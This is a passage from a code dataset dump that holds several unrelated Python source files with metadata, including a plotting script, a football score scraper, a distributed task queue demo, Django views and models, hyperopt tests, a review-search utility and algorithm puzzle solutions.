polyreg.PolyReg(x,y)\n\n# Fit and plot each polynomial\nx_plot = np.linspace(0,5,300)[np.newaxis].T\npoly_estimator.train(order_to_estimate)\ny_hat = 
poly_estimator.test(x_plot)\nplt.plot(x_plot,y_hat,\n color=colors,\n linewidth=2.5,\n label='Target Function')\nplt.plot(xe,ye,\n color=0.9*np.array([1,1,1]),\n linewidth=3,\n linestyle='none',\n marker='o',\n markeredgecolor='k',\n label='Observations')\nplt.plot(x[-1],y[-1],\n color=0.25*np.array([1,1,1]),\n linewidth=3,\n linestyle='none',\n marker='o',\n label='Target Value')\n\n# Plot legend outside axis\nplt.gca().grid('on')\nax = plt.gca()\naxes_bbox = ax.get_position()\nplt.xlabel('x')\nplt.ylabel('f(x)')\nplt.axis([0,5,-5,10])\nplt.legend()\nplt.tight_layout()","sub_path":"lecture01b.py","file_name":"lecture01b.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"511994422","text":"#!/usr/bin/python3.4\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport sys\n\ndef gethtmlformurl(url):\n try:\n a = str(urllib.request.urlopen(url).read().decode('utf-8'))\n return a;\n except Exception:\n print(\"Please check your network !!\")\n exit(0)\n\n\ndef main():\n if len(sys.argv) > 1:\n if sys.argv[1]==\"-help\":\n print(\"usage => python livematch.py [live/ended]\")\n elif sys.argv[1]==\"live\":\n getscores(gethtmlformurl(\"http://canlimacsonuclari.hurriyet.com.tr/livescore.aspx\"))\n elif sys.argv[1] == \"ended\":\n getscores(gethtmlformurl(\"http://canlimacsonuclari.hurriyet.com.tr/macsonuclari.aspx\"))\n else:\n print('usage => python livematch.py [live/ended]')\n\n else:\n print(\"usage => python livematch.py [live/ended]\")\n\n\n\n\n\n\n\n\n\n\n\ndef form(s):\n return s.replace(\" \",\"\").replace(\"\\n\",\"\").replace(\"'\",\"\").replace('\\\\',\"\")\n\ndef addnsbc(s):\n\n a=s\n for num in range(0,30-len(s)):\n a= a+\" \"\n\n return a\n\ndef trim(s):\n if s.endswith(\" \"): s = s[:-1]\n if s.startswith(\" \"): s = s[1:]\n return s\n\n\ndef getscores(doc):\n soup = BeautifulSoup(''.join(doc))\n soup= BeautifulSoup(soup.decode('utf-8','ignore'))\n tags = soup.find_all(attrs={\"class\" : \"L9GRAY\",\"bgcolor\":\"#ffcc00\"})\n\n for tag in tags:\n for names in tag.find_all(attrs={\"align\" : \"right\"}):\n right_name=form(names.text)\n for names in tag.find_all(attrs={\"align\" : \"left\"}):\n left_name=form(names.text)\n for score in tag.find_all(attrs={\"width\":\"34\",\"align\":\"center\",\"bgcolor\":\"#ff9900\"}):\n score = form(score.text)\n for time in tag.find_all(attrs={\"width\" : \"120\"}):\n time = form(time.text)\n\n\n row = addnsbc(time)+\" \"+addnsbc(right_name)+\" \"+addnsbc(score)+\" \"+addnsbc(left_name)\n print(row)\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n","sub_path":"score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"392164645","text":"import random, time, queue\nfrom multiprocessing.managers import BaseManager\n\n# 发送任务队列\ntask_qu = queue.Queue()\n\n# 接收队列\nresult_qu = queue.Queue()\n\n\n# 从BaseManager继承的QueueManager\n\nclass QueueManager(BaseManager):\n\tpass\n\n\n# 把两个queue都注册到网络上,callable参数关联Queue对象\nQueueManager.register('get_task_queue', callable=lambda: task_qu)\nQueueManager.register('get_result_queue', callable=lambda: result_qu)\n\n# 绑定端口5000,验证码abc\nmanager = QueueManager(address=('', 5000), authkey='abc'.encode('utf-8'))\n\n# 启动queue\nmanager.start()\n\n# 获得通过网络访问的queue\ntask = manager.get_task_queue()\nresult = manager.get_result_queue()\n\n# 放任务\nfor i in range(10):\n\t# n = random.randint(0, 1000)\n\tn = 
i\n\tprint(f'put {n}')\n\ttask.put(n)\n\n# 从队列读取\nprint('get results...')\nfor i in range(10):\n\tr = result.get(timeout=1000)\n\tprint(f'result = {r}')\n\n# 关闭\nmanager.shutdown()\nprint('master proc ended')\n","sub_path":"courses_by_liaoxuefeng/10进程和线程/5分布式进程/task_master.py","file_name":"task_master.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"412082485","text":"import xdj\n@xdj.controllers.Controller(\n url=\"login\",\n template=\"login.html\"\n)\nclass LoginController(xdj.BaseController):\n def __init__(self):\n from django.conf import settings\n self.supportLanguages=[]\n for k,v in settings.LANGUAGE_DICT.items():\n if k in [\"vi\",\"en\"]:\n self.supportLanguages.append(\n xdj.dobject(\n value = k,\n caption =v\n )\n )\n def on_get(selfs,sender):\n if isinstance(sender,xdj.Model):\n sender.username=\"\"\n sender.isError=False\n sender.languages=selfs.supportLanguages\n return selfs.render(sender)\n def on_post(selfs,sender):\n if isinstance(sender, xdj.Model):\n sender.languages = selfs.supportLanguages\n from django.contrib.auth import authenticate, login\n user = authenticate(username=sender.post_data.username[0], password=sender.post_data.password[0])\n if user is not None:\n login(sender.request, user)\n return sender.redirect(sender.appUrl)\n else:\n sender.isError=True\n\n sender.username=sender.post_data.username[0]\n return selfs.render(sender)","sub_path":"sysadmin/controllers/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"177171022","text":"\nfrom hyperopt import fmin, rand, tpe, hp, Trials\n\n\ndef test_quadratic1_rand():\n trials = Trials()\n\n argmin = fmin(\n fn=lambda x: (x - 3) ** 2,\n space=hp.uniform('x', -5, 5),\n algo=rand.suggest,\n max_evals=500,\n trials=trials)\n\n assert len(trials) == 500\n assert abs(argmin['x'] - 3.0) < .25\n\n\ndef test_quadratic1_tpe():\n trials = Trials()\n\n argmin = fmin(\n fn=lambda x: (x - 3) ** 2,\n space=hp.uniform('x', -5, 5),\n algo=tpe.suggest,\n max_evals=50,\n trials=trials)\n\n assert len(trials) == 50, len(trials)\n assert abs(argmin['x'] - 3.0) < .25, argmin\n","sub_path":"hyperopt/tests/test_fmin.py","file_name":"test_fmin.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"452499905","text":"# -*- coding: utf-8 -*-\nfrom collections import defaultdict\n\n\n__author__ = \"Mike Belov\"\n__copyright__ = \"Copyright (C) 2015, Nginx Inc. 
All rights reserved.\"\n__credits__ = [\"Mike Belov\", \"Andrei Belov\", \"Ivan Poluyanov\", \"Oleg Mamontov\", \"Andrew Alexeev\"]\n__license__ = \"\"\n__maintainer__ = \"Mike Belov\"\n__email__ = \"dedm@nginx.com\"\n\n\n\nclass Singleton(object):\n def __new__(cls, *args, **kwargs):\n if not hasattr(cls, '_instance'):\n cls._instance = super(Singleton, cls).__new__(cls)\n return cls._instance\n\n\nclass CommonDataTank(Singleton):\n def __init__(self):\n self.clients = defaultdict(dict)\n\n def register(self, type, object_id, client):\n \"\"\"\n Registers some client\n :param type: object type (prefix)\n :param object_id: object id\n :param client: some client\n \"\"\"\n self.clients[type][object_id] = client\n\n def unregister(self, type, object_id):\n \"\"\"\n Unregisters client\n :param type: object type (prefix)\n :param object_id: object id\n \"\"\"\n del self.clients[type][object_id]\n\n def flush(self, type):\n result = {}\n for object_id, client in self.clients.get(type, {}).iteritems():\n data = client.flush()\n if data:\n result[object_id] = data\n return result\n\n\n\nclass CommonDataClient(object):\n def __init__(self, object=None):\n self.object = object\n self.current = {}\n self.delivery = {}\n","sub_path":"amplify/agent/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"22570463","text":"# from pip._internal import main as pipmain\n# pipmain(['install', 'git+https://github.com/huggingface/transformers.git'])\nimport pandas as pd\nimport numpy as np\nfrom transformers import AutoTokenizer, AutoModelForSeq2SeqLM\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom tensorflow import keras\nimport spacy\n# !python -m spacy download en\nnlp = spacy.load('en')\n\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.metrics.pairwise import euclidean_distances\n\nimport nltk\n# nltk.download('punkt')\n# nltk.download('stopwords')\n# nltk.download('averaged_perceptron_tagger')\n# nltk.download('wordnet')\nfrom nltk.tokenize import sent_tokenize\n\nembed = hub.load('use')\nmodel = keras.models.load_model('model') # From google colab. 40 epochs 2**16 batchsize\nproduct_embeddings = pd.read_pickle('data/product_embeds.pkl') # Run google colab GPU to get the embeddings of all unique products in the dataset\n# Import model for summarization\ntokenizer_reddit = AutoTokenizer.from_pretrained(\"google/pegasus-reddit_tifu\")\nmodel_reddit = AutoModelForSeq2SeqLM.from_pretrained(\"google/pegasus-reddit_tifu\")\n\nMAX_LEN = 150 # For the summary length\n\n\ndef euclidean_similarity(embed1, embed2):\n distance_matrix = euclidean_distances(embed1, embed2)\n similarity_matrix = 1 - distance_matrix / np.max(distance_matrix)\n return similarity_matrix\n\n\ndef get_sentiment_scores(review, sentiment='positive'):\n \"\"\"\n Returns sentiment scores for each sentence in one review and embeddings of review sentences\n\n args:\n review(str): review to have sentiment scores\n sentiment(str): default to 'positive'\n\n returns:\n sentiment_scores(np.array): sentiment score for each sentence. shape = (1, num_sentences)\n embeddings(tf.Tensor): Universal Sentence Encoder embedding. 
shape = (1, 512)\n \"\"\"\n\n review_sentences = sent_tokenize(review)\n embeddings = embed(tf.convert_to_tensor(review_sentences))\n sentiment_scores = 1\n if sentiment is not None:\n sentiment_scores = model.predict(embeddings)[:, 1].reshape(-1, 1) # 'positive'\n if sentiment == 'negative':\n sentiment_scores = 1 - sentiment_scores\n return sentiment_scores, embeddings\n\n\ndef similarity_scores(embeddings, query, keywords=True, euclidean=False):\n \"\"\"\n Returns a matrix of similarities between the sentences of a review(in embeddings) and the keywords or query sentences.\n\n args:\n embeddings(tf.Tensor): USE embeddings of a review sentences. shape = (1, 512)\n query(str): query that will be tokenized into bag-of-keywords or sentences\n keywords(bool): whether to use bag-of-words(keywords) in the query for computing the similarity score\n euclidean(bool): whether to use euclidean distance to compute similarity matrix\n\n returns:\n similarity_scores(np.array): similarity score matrix. shape = (num_sentences_in_a_review, num_keywords or num_query_sentences)\n \"\"\"\n\n if keywords:\n keywords = list(dict.fromkeys(\n [token.lemma_ for token in nlp(query.lower()) if token.pos_ in ['NOUN', 'PROPN', 'ADJ', 'VERB', 'X']]))\n keywords_len = len(keywords)\n embeddings_k = tf.concat([embed(keywords), embeddings], axis=0).numpy()\n similarity_matrix = euclidean_similarity(embeddings_k, embeddings_k) if euclidean else cosine_similarity(\n embeddings_k, embeddings_k)\n return similarity_matrix[keywords_len:, :keywords_len], keywords\n else:\n query_sentences = sent_tokenize(query)\n query_len = len(query_sentences)\n embeddings_q = tf.concat([embed(query_sentences), embeddings], axis=0).numpy()\n similarity_matrix = euclidean_similarity(embeddings_q, embeddings_q) if euclidean else cosine_similarity(\n embeddings_q, embeddings_q)\n return similarity_matrix[query_len:, :query_len], query_sentences\n\n\ndef sentimental_similarity_score_of_a_review(review, query, sentiment='positive', emphasized_keywords=None,\n euclidean=False):\n \"\"\"\n Returns a positive similarity score between a review and a query.\n\n args:\n review(str): review\n query(str): query\n sentiment(str): If not 'negative', it's considered as 'positive'. 
'positive' is the default.\n emphasized_keywords(list): list of keywords to be emphasized (currently 1: 0.01)\n euclidean(bool): whether to use euclidean distance for similarity matrix.\n\n returns:\n similarity score(int): (positive) similarity score between a review and a query\n \"\"\"\n\n if review is None:\n return np.nan\n\n sentiment_scores, embeddings = get_sentiment_scores(review, sentiment)\n similarity_scores_keywords, keywords = similarity_scores(embeddings, query, euclidean=euclidean)\n similarity_scores_sentences, query_sentences = similarity_scores(embeddings, query, keywords=False,\n euclidean=euclidean)\n keywords_len, emphasized_keywords_len = len(keywords), len(emphasized_keywords)\n if emphasized_keywords and emphasized_keywords_len < keywords_len:\n emphasized_keywords = [token.lemma_ for token in nlp(' '.join(emphasized_keywords).lower()) if\n token.pos_ in ['NOUN', 'PROPN', 'ADJ', 'VERB', 'X']]\n regular_keywords_len = keywords_len - emphasized_keywords_len\n heavy_weight, light_weight = keywords_len * 0.9 / emphasized_keywords_len, keywords_len * 0.1 / regular_keywords_len\n weights_keywords = [heavy_weight if keyword in emphasized_keywords else light_weight for keyword in keywords]\n weights_sentences = [\n sum([heavy_weight if keyword in sentence else light_weight for keyword in emphasized_keywords]) for sentence\n in query_sentences]\n else:\n weights_keywords, weights_sentences = 1, 1\n\n keyword_scores = (similarity_scores_keywords * sentiment_scores * weights_keywords).max(axis=1)\n pos_sim_score_keywords = np.sqrt(keyword_scores.mean())\n\n query_sentence_scores = (similarity_scores_sentences * sentiment_scores * weights_sentences).max(axis=1)\n pos_sim_score_sentences = np.sqrt(query_sentence_scores.mean())\n\n return np.min([pos_sim_score_keywords, pos_sim_score_sentences])\n\n\ndef get_similarity_score_with_product(query, euclidean=False):\n \"\"\"\n Returns most similar product indices and its similarity scores with respect to the query\n\n args:\n query(str)\n euclidean(bool): whether to use euclidean distance for similarity matrix\n\n returns:\n product's indices of similarity and the similarity scores in descending order of similarity\n \"\"\"\n similarity_scores_keywords, keywords = similarity_scores(product_embeddings, query, euclidean=euclidean)\n similarity_scores_sentences, query_sentences = similarity_scores(product_embeddings, query, keywords=False,\n euclidean=euclidean)\n\n keyword_scores = similarity_scores_keywords.max(axis=1)\n query_sentence_scores = similarity_scores_sentences.max(axis=1)\n\n sim_scores = np.concatenate((keyword_scores.reshape(-1, 1), query_sentence_scores.reshape(-1, 1)), axis=1).min(\n axis=1)\n\n return np.argsort(sim_scores)[::-1], np.sort(sim_scores)[::-1]\n\ndef create_summary(text):\n \"\"\"\n Create summary of the input text using the NLP model\n \"\"\"\n tokenized_text = tokenizer_reddit.encode(text, return_tensors=\"pt\", truncation=True)\n summary_ids = model_reddit.generate(tokenized_text,\n num_beams=4,\n no_repeat_ngram_size=2,\n min_length=30,\n max_length=MAX_LEN,\n early_stopping=True)\n return \"...\"+tokenizer_reddit.decode(summary_ids[0], skip_special_tokens=True)+\"...\"","sub_path":"search_engine_app/app_utils.py","file_name":"app_utils.py","file_ext":"py","file_size_in_byte":7917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"468588798","text":"# coding=utf8\n\"\"\"\n创建者:马子轩\n贡献者:\n创建时间: 2020年05月16日\n最后保存时间: 2020年05月16日\n\"\"\"\n\n\nfrom 
EO.models import BulletChat\nfrom django.shortcuts import HttpResponse, render, redirect\n\n\ndef index(request):\n \"\"\"直接返回页面\"\"\"\n bullet_group = BulletChat.objects.filter(verify=True)\n return render(request, \"App/520.html\", {\n 'bullet': bullet_group\n })\n\n\ndef stop(request):\n \"\"\"网站停止运营公告\"\"\"\n return render(request, \"App/520stop.html\")\n\n\ndef bullet(request):\n if request.method == \"POST\":\n name = request.POST['name']\n contain = request.POST['contain']\n if name and contain:\n BulletChat.objects.create(\n name=name,\n contain=contain,\n )\n return redirect('APPApi:520')\n","sub_path":"EO/AppApi/Light.py","file_name":"Light.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"174727042","text":"import sys\n\nouf = open('/Users/sigma/Documents/output.txt', 'w')\n\nn, k = 32, 500\n\nprint('Case #1:', file=ouf)\nfor i in range(1 << (n - 2)):\n good = True\n for a in range(2, 11):\n x = a ** (n - 1) + 1 + sum([a ** j for j in range(1, n - 1) if (i >> (j - 1)) & 1])\n if x % (a + 1) != 0:\n good = False\n break\n if good:\n print('1{}1 {}'.format(bin(i)[2:].zfill(n - 2), ' '.join([str(a + 1) for a in range(2, 11)])), file=ouf)\n k -= 1\n if k == 0:\n break","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_haku_main.py","file_name":"16_0_3_haku_main.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"257715762","text":"class Solution:\n def threeEqualParts(self, A: 'List[int]') -> 'List[int]':\n length=len(A)\n flag=0\n low=high=0\n for i in range(length):\n for j in range(i+2,length):\n a=self.value(A[:i+1])\n b=self.value(A[i+1:j])\n c=self.value(A[j:])\n if int(a)==int(b) and int(b)==int(c):\n flag=1\n low=i\n high=j\n if flag==1:\n return [low,high]\n else:\n return [-1,-1]\n def value(self,nums):\n length=len(nums)\n res=[]\n for i in range(length):\n res.append(str(nums[i]))\n return \"\".join(res)\nprint(Solution().threeEqualParts([1,1,0,1,1]))","sub_path":"201903/927.py","file_name":"927.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"528974557","text":"# 在二维平面上,给定两个顶边和底边与X轴平行的正方形。请找出能同时将这两个正方形分割成等面积两部分的一条直线。\r\n\r\n# 每个正方形的数据square包含3个数值,正方形的左下顶点坐标[X,Y] = [square[0],square[1]],以及正方形的边长square[2]。所求直线穿过两个正方形会形成4个交点,请返回4个交点形成线段的两端点坐标(两个端点即为4个交点中距离最远的2个点,这2个点所连成的线段一定会穿过另外2个交点)。2个端点坐标[X1,Y1]和[X2,Y2]的返回格式为{X1,Y1,X2,Y2},要求若X1 != X2,需保证X1 < X2,否则需保证Y1 <= Y2。\r\n\r\n# 若同时有多条直线满足要求,则选择斜率最大的一条计算并返回(与Y轴平行的直线视为斜率无穷大)。\r\n\r\n# 示例:\r\n\r\n# 输入:\r\n# square1 = {-1, -1, 2}\r\n# square2 = {0, -1, 2}\r\n# 输出: {-1,0,2,0}\r\n# 解释: 直线 y = 0 能将两个正方形同时分为等面积的两部分,返回的两线段端点为[-1,0]和[2,0]\r\n# 提示:\r\n\r\n# square.length == 3\r\n# square[2] > 0\r\n\r\n# 来源:力扣(LeetCode)\r\n# 链接:https://leetcode-cn.com/problems/bisect-squares-lcci\r\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\r\n\r\n# 在二维平面上,给定两个顶边和底边与X轴平行的正方形。请找出能同时将这两个正方形分割成等面积两部分的一条直线。\r\n\r\n# 每个正方形的数据square包含3个数值,正方形的左下顶点坐标[X,Y] = [square[0],square[1]],以及正方形的边长square[2]。所求直线穿过两个正方形会形成4个交点,请返回4个交点形成线段的两端点坐标(两个端点即为4个交点中距离最远的2个点,这2个点所连成的线段一定会穿过另外2个交点)。2个端点坐标[X1,Y1]和[X2,Y2]的返回格式为{X1,Y1,X2,Y2},要求若X1 != X2,需保证X1 < X2,否则需保证Y1 <= Y2。\r\n\r\n# 若同时有多条直线满足要求,则选择斜率最大的一条计算并返回(与Y轴平行的直线视为斜率无穷大)。\r\n\r\n# 示例:\r\n\r\n# 输入:\r\n# square1 = {-1, -1, 2}\r\n# square2 = {0, -1, 2}\r\n# 输出: {-1,0,2,0}\r\n# 解释: 直线 y = 0 能将两个正方形同时分为等面积的两部分,返回的两线段端点为[-1,0]和[2,0]\r\n# 
提示:\r\n\r\n# square.length == 3\r\n# square[2] > 0\r\n\r\n# 来源:力扣(LeetCode)\r\n# 链接:https://leetcode-cn.com/problems/bisect-squares-lcci\r\n# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\r\n\r\ntry:\r\n MOD = 10**9 + 7\r\n from collections import defaultdict\r\n from typing import *\r\n import os, sys, random, math, threading\r\n curFileParentPath = os.path.dirname(\r\n os.path.dirname(os.path.realpath(__file__)))\r\n sys.path.append(curFileParentPath)\r\n from Utils.Tree import *\r\n from Utils.ListNode import *\r\n from Utils.Executor import Execute\r\nexcept Exception as err:\r\n print('Import failed: ' + str(err))\r\n\r\n\r\nclass Solution:\r\n def cutSquares(self, square1: List[int],\r\n square2: List[int]) -> List[float]:\r\n # 两个正方形的中心形成的直线即为所求\r\n # 注意中心重合的情况, 此时直线平行于y轴\r\n x1, y1, e1 = square1\r\n x2, y2, e2 = square2\r\n c1 = (x1 + e1 / 2, y1 + e1 / 2)\r\n c2 = (x2 + e2 / 2, y2 + e2 / 2)\r\n if c1 == c2:\r\n # 中心为同一点, 直线要平行于y轴\r\n newx = x1 + e1 / 2\r\n mny = min(y1, y2)\r\n mxy = max(y1 + e1, y2 + e2)\r\n return [newx, mny, newx, mxy]\r\n else:\r\n # 求交点直线与正方形最外边的4个平行和垂直x轴的直线的交点\r\n # 若其在线段内, 则将其加入res中\r\n # 最后求距离最大的两个交点, 即为结果\r\n mnX, mxX = min(x1, x2), max(x1 + e1, x2 + e2)\r\n mnY, mxY = min(y1, y2), max(y1 + e1, y2 + e2)\r\n cx1, cy1 = c1\r\n cx2, cy2 = c2\r\n if cx1 == cx2:\r\n return [cx1, mnY, cx1, mxY]\r\n if cy1 == cy2:\r\n return [mnX, cy1, mxX, cy1]\r\n k = (cy1 - cy2) / (cx1 - cx2)\r\n b = cy1 - k * cx1\r\n\r\n def inLines(x, y):\r\n return (x1 <= x <= x1 + e1\r\n or x2 <= x <= x2 + e2) and (y1 <= y <= y1 + e1\r\n or y2 <= y <= y2 + e2)\r\n\r\n p = []\r\n for x in (mnX, mxX):\r\n y = k * x + b\r\n if inLines(x, y):\r\n p.append((x, y))\r\n for y in (mnY, mxX):\r\n x = (y - b) / k\r\n if inLines(x, y):\r\n p.append((x, y))\r\n\r\n mxdist = 0\r\n res = []\r\n for i in range(len(p)):\r\n for j in range(i + 1, len(p)):\r\n x1, y1 = p[i]\r\n x2, y2 = p[j]\r\n dist = (x2 - x1)**2 + (y2 - y1)**2\r\n if dist > mxdist:\r\n mxdist = dist\r\n if x1 < x2 or x1 == x2 and y1 < y2:\r\n res = [x1, y1, x2, y2]\r\n else:\r\n res = [x2, y2, x1, y1]\r\n return res\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n print(Solution().cutSquares([68, 130, 64],\r\n [-230, 194, 7])) # or Execute()\r\n except Exception as err:\r\n print(err)\r\n","sub_path":"Medium/面试题 16.13. 平分正方形.py","file_name":"面试题 16.13. 
平分正方形.py","file_ext":"py","file_size_in_byte":5604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"616545534","text":"import pytest\nimport json\nfrom aionetworking.actions.echo import InvalidRequestError\nfrom aionetworking.utils import aone\n\n\nclass TestEcho:\n\n @pytest.mark.asyncio\n async def test_00_do_one(self, echo_action, echo_request_object, echo_response):\n response = await echo_action.do_one(echo_request_object)\n assert response == echo_response\n\n @pytest.mark.asyncio\n async def test_01_do_notification(self, echo_action, echo_notification_request_object, echo_notification, client_sock_str):\n response = await echo_action.do_one(echo_notification_request_object)\n assert response is None\n notification = await aone(echo_action.get_notifications(client_sock_str))\n assert notification == echo_notification\n\n @pytest.mark.asyncio\n async def test_02_on_exception(self, echo_action, echo_exception_request_object, echo_exception_response):\n with pytest.raises(InvalidRequestError):\n await echo_action.do_one(echo_exception_request_object)\n try:\n await echo_action.do_one(echo_exception_request_object)\n except InvalidRequestError as e:\n response = echo_action.on_exception(echo_exception_request_object, e)\n assert response == echo_exception_response\n\n @pytest.mark.asyncio\n async def test_03_on_decode_error(self, echo_action, echo_request_invalid_json, echo_decode_error_response):\n with pytest.raises(json.decoder.JSONDecodeError):\n json.loads(echo_request_invalid_json)\n try:\n json.loads(echo_request_invalid_json)\n except json.decoder.JSONDecodeError as e:\n response = echo_action.on_decode_error(echo_request_invalid_json, e)\n assert response == echo_decode_error_response\n","sub_path":"tests/test_actions/test_echo.py","file_name":"test_echo.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"499186381","text":"\"\"\"\nModule responsible for sending emails.\n\"\"\"\n\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.template.loader import render_to_string\n\n\ndef send_email(subject, message, recepient_list, template, email_data):\n template = 'emails/' + template\n html_message=render_to_string(template, email_data)\n send_mail(subject,\n message,\n settings.DEFAULT_FROM_EMAIL,\n recepient_list,\n html_message=html_message\n )\n","sub_path":"vacomsBlog/utils/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"379529190","text":"import os\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom personnel.models import Department,Staff\n\n\n# Create your models here.\n\n\n\ndef get_media_abspath():\n \"\"\"\n 所有文件都直接放到 media/file 目录下,不再做不必要的划分,增加麻烦!\n \"\"\"\n media_root = settings.MEDIA_ROOT\n file_path = os.path.join(media_root,\"file\")\n return file_path\n\n#\n# class Directory(models.Model):\n# \"\"\"\n# name: 用户能看到的文件目录名. 
todo: 同级目录下不允许重复\n# parent: 上级目录,如果本身是根目录则 parent 为空字符\n# path: 用户能看到的相对路径,需要用 get_full_path 才能转换成绝对路径\n# \"\"\"\n# nid = models.AutoField(primary_key=True)\n# name = models.CharField(max_length=256) # 如 / home\n# owner = models.ForeignKey(Staff, to_field='sid', on_delete=models.CASCADE,db_constraint=False,verbose_name=\"上传者\")\n# parent = models.ForeignKey('Directory', null=True, on_delete=models.CASCADE) # 只有根目录没有 parent\n# path = models.CharField(max_length=4096, default='')\n# depart = models.ForeignKey(Department, to_field='id', null=True, on_delete=models.CASCADE,verbose_name=\"所属部门\") # 跟部门关联\n#\n#\n# def __str__(self):\n# return self.name or '/'\n#\n# class Meta:\n#\n# db_table = \"file_directory\"\n# verbose_name = \"文件目录\"\n# verbose_name_plural = \"文件目录\"\n#\n#\n# @classmethod\n# def create_root_dir(cls, user):\n# \"\"\"\n# 用户注册时,会同时创建一个根目录对象\n# \"\"\"\n# directory = cls.objects.create(\n# name= '/',\n# owner=user,\n# parent=None,\n# path='' # 根目录为空字符,方便后续 URL 拼接不出现 // 影响美观\n# )\n# return directory\n#\n# def get_url(self):\n# return '/{}/{}'.format(self.owner.username, self.path)\n#\n# def rmdir(self):\n# \"\"\"\n# 删除子目录和子目录下的文件,以及自身包含的文件和自身\n# \"\"\"\n# for subdir in Directory.objects.filter(parent=self):\n# for file in subdir.file_set.all():\n# Link.minus_one(file)\n#\n# for file in self.file_set.all():\n# Link.minus_one(file)\n#\n# self.delete()\n\n\nclass File(models.Model):\n \"\"\"\n name: 用户能看到的文件目录名.\n 考虑到文件名只是存在于数据库的字段,所以不需要限制命名规则\n digest: 文件的 sha1 摘要,也是文件真正的名字\n owner: 文件所有者\n size: 文件大小\n parent: 上级目录\n path: 相对路径,包含了 digest 作为文件名,和用户自定义的树形结构对应\n 但是服务器的储存不按照这个结构存放\n 如果对应的话,那么多个File对象映射同一个文件时,下载路径按照 path 来会出错\n 此外,path 需要包含用户的根目录,如 user_12,否则用户无法引用到其他用户的文件\n 文件的 path 不应该包括文件名,否则会造成改 name 时 path 不能一起改\n \"\"\"\n classify_choice = ((1, \"文件\"), (2, \"图片\"))\n\n nid = models.AutoField(primary_key=True)\n name = models.CharField(max_length=256)\n owner = models.ForeignKey(Staff, to_field='sid', on_delete=models.CASCADE,db_constraint=False,verbose_name=\"上传者\")\n classify = models.IntegerField(choices=classify_choice, default=1, verbose_name=\"文件类型\")\n size = models.IntegerField(default=0)\n # parent = models.ForeignKey(Directory, on_delete=models.CASCADE)\n digest = models.CharField(max_length=40)\n path = models.CharField(max_length=4096, default='')\n create_time = models.DateTimeField(auto_now_add=True, verbose_name='创建时间')\n last_edit = models.DateTimeField(auto_now=True, verbose_name='最后编辑时间')\n\n class Meta:\n\n db_table = \"file\"\n verbose_name = \"文件信息\"\n verbose_name_plural = \"文件信息\"\n\n def __str__(self):\n return self.name\n\n def get_full_path(self):\n \"\"\" 文件的服务器路径 \"\"\"\n return os.path.join(get_media_abspath(), self.digest)\n\n def remove_from_disk(self):\n \"\"\"\n 删除磁盘上的文件,而不是只减少计数器+删除 File 对象\n 用于发现重复文件后,清除新添加的文件,保留用户的 File 对象,改写其 path 值\n \"\"\"\n os.remove(self.get_full_path())\n\n def get_url(self):\n \"\"\"\n 没有这步判断,根目录下的文件链接会多一条杠。\n \"\"\"\n if self.path:\n return '/{}/{}/{}'.format(self.owner.name, self.path, self.name)\n else:\n return '/{}/{}'.format(self.owner.name, self.name)\n\n def get_size(self): # Byte\n \"\"\"\n make the file size more human-readable\n \"\"\"\n size = self.size\n if size > 1024**3: # GB\n size = '{:.2f} GB'.format(size/(1024**3))\n elif size > 1024**2: # MG\n size = '{:.2f} MB'.format(size/(1024**2))\n elif size > 1024:\n size = '{:.2f} KB'.format(size/(1024))\n else:\n size = '{:.2f} Bytes'.format(size)\n return size\n\n\nclass FileTag(models.Model):\n nid = models.AutoField(primary_key=True)\n name = 
